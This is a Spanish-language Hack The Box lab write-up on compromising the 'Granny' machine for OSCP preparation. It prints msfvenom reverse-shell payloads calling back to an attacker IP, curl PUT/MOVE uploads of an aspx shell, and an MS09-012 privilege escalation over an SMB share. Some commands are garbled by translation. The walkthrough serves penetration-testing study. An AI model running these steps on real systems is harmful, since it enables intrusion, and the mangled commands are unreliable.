Hack the Box es una plataforma en línea para probar y mejorar tus habilidades en pruebas de penetración y ciberseguridad.
En esta serie de artículos mostraremos cómo los evaluadores junior completan algunas máquinas de Hack The Box en su camino hacia OSCP, una certificación muy conocida, respetada y requerida para muchos puestos de ciberseguridad. Los certificados OSCP son capaces de identificar las vulnerabilidades existentes y ejecutar ataques organizados de manera controlada. Pueden aprovechar o modificar el código de exploits existentes en su beneficio, realizar pivoting en la red y exfiltrar datos, y comprometer los sistemas debido a configuraciones deficientes.
¡Empecemos con la diversión!
Granny
Pasos Iniciales
El propio Nmap ha descubierto una amplia gama de métodos http arriesgados permitidos por el anfitrión.
Con el método PUT
podemos subir un shell inverso aspx
. Es importante añadir la extensión de
el archivo, pero el servidor no nos deja ponerlo en aspx
. La solución es usar el método MOVE
para asignarle la extensión aspx
:
IMPORTANTE: Para subir un archivo binario usando curl
, necesitamos usar la bandera de datos-binarios
.
- Crear la carga útil.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.31 LPORT=12345 -f aspx -o shell.aspx
- Cárguelo como un archivo de texto.
curl -X PUT http://10.10.10.15/peng_shell.txt --data-binary @shell.aspx
- Asigne la extensión
aspx
.curl -X MOVE -H 'Destino:http://10.10.10.15/peng_shell.aspx' http://10.10.10.15/peng_shell.txt
Conseguimos una shell como: Servicio de red sin autoridad
.
Root
Después de un año buscando una hazaña que funcione, MS09-012 (churrasco.exe
) funciona!
Después de descargarlo y "deshacerlo", lo renombramos a exploit.exe
.
Para ejecutarlo en la máquina víctima necesitamos crear un recurso compartido SMB local:
- En Kali:
Impacket-smbserver smbDir $(pwd)
. - En la máquina víctima:
10.10.14.31 smbDir exploit.exe whoami
.
Ahora podemos ejecutar comandos individuales como root, pero aún así nos gustaría tener un shell adecuado.
- En Kali:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.31 LPORT=6969 -f exe > shell.exe
. - En Kali:
ncat -lnvp 6969
. - En la máquina de la víctima:
10.10.14.31
Dir -exploit.exe
10.10.14.31
Dir -shell.exe
.
Nota: La shell tarda un poco en llegar, pero obtenemos una shell como root.